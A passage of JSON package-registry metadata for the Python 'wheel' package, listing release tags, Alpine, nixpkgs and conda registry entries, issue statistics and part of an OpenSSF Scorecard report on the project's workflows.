ies/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.285Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":21.680705976734856,"stargazers_count":8.25645139724562,"forks_count":6.89931809065383,"average":9.209118866158576},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.14","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages/py3-wheel/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":17,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-04T10:19:33.811Z","updated_at":"2023-02-04T10:19:33.811Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.14","url":"https://pkgs.alpinelinux.org/packages?branch=v3.14","ecosystem":"alpine","default":false,"packages_count":14958,"maintainers_count":258,"namespaces_count":2,"keywords_count":2179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":675},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.706Z","updated_at":"2026-06-10T05:14:53.730Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.14/namespaces"}},{"id":12823247,"name":"python310Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T18:28:32.911Z","latest_release_published_at":"2026-01-26T18:28:32.911Z","latest_release_number":"0.38.4","last_synced_at":"2026-03-05T06:38:24.270Z","created_at":"2026-01-26T18:28:32.757Z","updated_at":"2026-03-05T06:38:24.647Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python310Packages.wheel","install_command":"nix-env -iA nixpkgs.python310Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/wheel/default.nix#L41","metadata":{"nix_attribute":"python3.10-wheel-0.38.4","position":"pkgs/development/python-modules/wheel/default.nix:41","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/python310Packages.wheel?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-05T06:38:24.542Z","updated_at":"2026-03-05T06:38:24.542Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-23.05","url":"https://channels.nixos.org/nixos-23.05","ecosystem":"nixpkgs","default":false,"packages_count":101092,"maintainers_count":2622,"namespaces_count":0,"keywords_count":613,"github":"NixOS","metadata":{"funded_packages_count":183},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.882Z","updated_at":"2026-06-10T05:16:22.193Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/namespaces"}},{"id":5294308,"name":"wheel","ecosystem":"conda","description":null,"homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":null,"versions_count":28,"first_release_published_at":"2022-10-03T15:56:41.382Z","latest_release_published_at":"2022-11-10T03:41:54.000Z","latest_release_number":"0.38.4","last_synced_at":"2026-04-08T09:56:29.567Z","created_at":"2022-10-03T15:56:41.374Z","updated_at":"2026-04-08T09:56:29.567Z","registry_url":"https://anaconda.org/conda-forge/wheel","install_command":"conda install -c conda-forge wheel","documentation_url":null,"metadata":{},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses 